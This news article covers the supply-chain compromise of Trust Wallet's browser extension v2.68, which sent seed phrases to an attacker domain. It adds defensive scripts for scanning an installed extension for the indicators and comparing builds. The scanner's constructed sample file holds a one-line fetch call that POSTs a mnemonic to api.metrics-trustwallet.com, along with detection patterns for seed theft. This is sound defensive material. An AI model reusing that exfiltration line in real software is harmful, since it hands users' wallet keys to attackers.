SlowMist: Trust Wallet's codebase appears to have been compromised; users are advised to disconnect from the internet and transfer their assets.


On the 24th, Trust Wallet's browser extension v2.68 was confirmed to contain malicious code; by the official count, users lost roughly $7 million within two days. CZ announced that the project would cover all losses. Because this was a tampered official release rather than a phishing campaign, it is equivalent to the software shipping with a backdoor at the release stage: users who installed the legitimate update from the official channel had no way to protect themselves, however careful they were.

How the malware got into the official release

According to SlowMist's reverse engineering, the attackers added a file named 4482.js to version 2.68, disguised as an analytics module. When a user enters or imports a seed phrase, the script packages the key material and sends it to a server at api.metrics-trustwallet.com. Because the release pipeline itself was compromised, the malicious component shipped under the official signature, so neither antivirus software nor the browser extension store's review process could intercept it in time. A valid signature only proves that a package came out of the signing step; it says nothing about what went into it.
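The indicators above (the file name 4482.js, the host api.metrics-trustwallet.com and the version string 2.68) are enough to triage an installed copy of the extension. The script below is an added example, not SlowMist's or Trust Wallet's code: it walks an unpacked extension directory, reports the exact indicators from the article, and flags any script that both touches seed-phrase material and makes a network call. The regular expressions are a heuristic of mine, not a published signature, and the sample extension it builds in a temporary directory (including the contents of its 4482.js) is constructed for illustration, not a real artifact.

```python
"""Triage an unpacked browser-extension directory for the indicators named in
the SlowMist analysis: the file 4482.js, the host api.metrics-trustwallet.com
and the affected version 2.68.

Added example, not SlowMist's or Trust Wallet's code. The indicators come from
the article; the heuristic patterns and the sample extension are assumptions.
"""
import json
import os
import re
import tempfile

IOC_FILENAME = "4482.js"
IOC_HOST = "api.metrics-trustwallet.com"
IOC_VERSION = "2.68"

# Heuristic (assumption): a script that both references seed-phrase or key
# material and makes a network call deserves a human look even when the
# exact indicators are absent.
SEED_PATTERN = re.compile(r"\b(mnemonic|seed\s*phrase|privateKey|private_key)\b", re.I)
NET_PATTERN = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon|WebSocket)\b")


def scan_extension(root):
    """Return a dict of findings for the unpacked extension at `root`."""
    findings = {"version": None, "version_match": False,
                "ioc_files": [], "ioc_host_hits": [], "seed_and_network": []}
    manifest = os.path.join(root, "manifest.json")
    if os.path.isfile(manifest):
        with open(manifest, encoding="utf-8") as fh:
            findings["version"] = json.load(fh).get("version")
        findings["version_match"] = findings["version"] == IOC_VERSION
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == IOC_FILENAME:
                findings["ioc_files"].append(rel)
            if not name.endswith((".js", ".json", ".html")):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if IOC_HOST in text:
                findings["ioc_host_hits"].append(rel)
            if SEED_PATTERN.search(text) and NET_PATTERN.search(text):
                findings["seed_and_network"].append(rel)
    return findings


def verdict(findings):
    """Collapse findings into 'compromised', 'suspicious' or 'clean'.
    Exact indicators are decisive; version or heuristic hits alone are not."""
    if findings["ioc_files"] or findings["ioc_host_hits"]:
        return "compromised"
    if findings["version_match"] or findings["seed_and_network"]:
        return "suspicious"
    return "clean"


def build_sample_extension():
    """Constructed sample mimicking the tampered layout; not a real artifact."""
    root = tempfile.mkdtemp(prefix="ext-")
    with open(os.path.join(root, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "Wallet", "version": "2.68"}, fh)
    with open(os.path.join(root, "4482.js"), "w", encoding="utf-8") as fh:
        fh.write('function track(m){fetch("https://api.metrics-trustwallet.com/v1",'
                 '{method:"POST",body:JSON.stringify({mnemonic:m})})}\n')
    with open(os.path.join(root, "popup.js"), "w", encoding="utf-8") as fh:
        fh.write('document.getElementById("btn").onclick=()=>alert("hi");\n')
    return root


if __name__ == "__main__":
    sample = build_sample_extension()
    result = scan_extension(sample)
    print(verdict(result), result)
```

To run it against a real installation, point `scan_extension` at the extension's unpacked directory under the browser profile instead of the constructed sample. A "clean" verdict from this script only means these particular indicators are absent; it is not proof that a given build is untouched.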

On-chain evidence points to a professional team

On-chain investigators ZachXBT and Lookonchain traced several highly active withdrawal routes: BTC, ETH and SOL were rapidly split and moved into platforms such as KuCoin, ChangeNOW and FixedFloat, with roughly $4.25 million already laundered. As of the morning of December 26, about $2.8 million remained in the attacker's addresses. The speed of the splitting and the pre-staged intermediary accounts point to a well-drilled team rather than a hastily assembled phishing group.

Official response and compensation plan

More than 30 hours after the incident surfaced, Trust Wallet issued a statement acknowledging the compromise. CZ, who effectively controls the project, then wrote in a social media post:

If the loss is within a manageable range, we will provide full compensation through the SAFU Fund.

The promise has steadied the market for now, but it also exposes a contradiction: when something goes wrong, a self-custody wallet still depends on a centralized pool of capital to make users whole.

Emergency handling for affected users

Simply updating or removing the extension does not remove the risk, because the seed phrase has already left the device, and whoever holds it can drain the wallet at any moment. The security team's recommendations:

  • Disconnect from the network and generate a new wallet in an offline environment.
  • Using a hardware wallet or a clean, newly set-up device (never the affected one), import the old private key and move the remaining assets to the new wallet.
  • Retire the old address permanently and never reuse it.

Trust Wallet has said it will publish a full forensic report and remediation measures later. The security community is urging open-source projects to adopt reproducible builds, so that the package shipped to users can be checked byte for byte against a build from the published source and release-stage tampering becomes detectable.
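What a reproducible build buys you is a concrete check: unpack the package the store actually shipped, build the tagged source yourself, and diff the two trees. The script below is an added example of that comparison, not Trust Wallet's or SlowMist's tooling. It assumes both packages are unpacked to directories and that the build really is byte-for-byte reproducible (pinned toolchain, no timestamps or random chunk names in the output); without that, every file differs and the comparison says nothing. The two sample trees it writes to temporary directories are constructed to echo the incident's shape (an extra 4482.js and one altered script); the article does not say how the real script was wired in, so the import line in the sample is an invented placeholder.

```python
"""Diff a store-distributed extension package against a tree built from the
tagged source. Added example, not Trust Wallet's or SlowMist's tooling; it
assumes a byte-for-byte reproducible build and unpacked directories."""
import hashlib
import json
import os
import tempfile


def tree_digests(root):
    """Map each relative path under `root` to the SHA-256 of its bytes."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def tree_hash(digests):
    """One digest over the sorted (path, sha256) pairs, so the result does not
    depend on the order in which the filesystem enumerated the files."""
    h = hashlib.sha256()
    for rel in sorted(digests):
        h.update(f"{rel}\0{digests[rel]}\n".encode())
    return h.hexdigest()


def diff_trees(built, shipped):
    """Classify files as added (only in the shipped package), missing (only in
    the local build) or modified (present in both, bytes differ)."""
    common = set(built) & set(shipped)
    return {
        "added": sorted(set(shipped) - set(built)),
        "missing": sorted(set(built) - set(shipped)),
        "modified": sorted(p for p in common if built[p] != shipped[p]),
    }


def compare(built_root, shipped_root):
    """Return (identical, delta) for the two unpacked trees."""
    built, shipped = tree_digests(built_root), tree_digests(shipped_root)
    return tree_hash(built) == tree_hash(shipped), diff_trees(built, shipped)


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_sample_trees():
    """Constructed sample: a clean local build and a shipped package with one
    extra file and one altered script. Not real Trust Wallet artifacts."""
    built = tempfile.mkdtemp(prefix="built-")
    shipped = tempfile.mkdtemp(prefix="shipped-")
    manifest = json.dumps({"name": "Wallet", "version": "2.68"})
    for root in (built, shipped):
        _write(root, "manifest.json", manifest)
        _write(root, "js/background.js", "chrome.runtime.onInstalled.addListener(()=>{});\n")
    _write(built, "js/popup.js", "export function init(){}\n")
    # Placeholder wiring (assumption): the article does not say how 4482.js was loaded.
    _write(shipped, "js/popup.js", "import './4482.js';\nexport function init(){}\n")
    _write(shipped, "js/4482.js", "// analytics\n")
    return built, shipped


if __name__ == "__main__":
    same, delta = compare(*build_sample_trees())
    print("identical" if same else "MISMATCH", delta)
```

In practice the "built" side comes from a clean CI job or a second independent builder, and the tree hash is what gets published alongside the release so anyone can recompute it. The file-level delta is what turns a mismatch into something an analyst can act on: an unexpected added file or a modified script is exactly the pattern described above.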

Disclaimer: The content above is only the author's opinion which does not represent any position of Followin, and is not intended as, and shall not be understood or construed as, investment advice from Followin.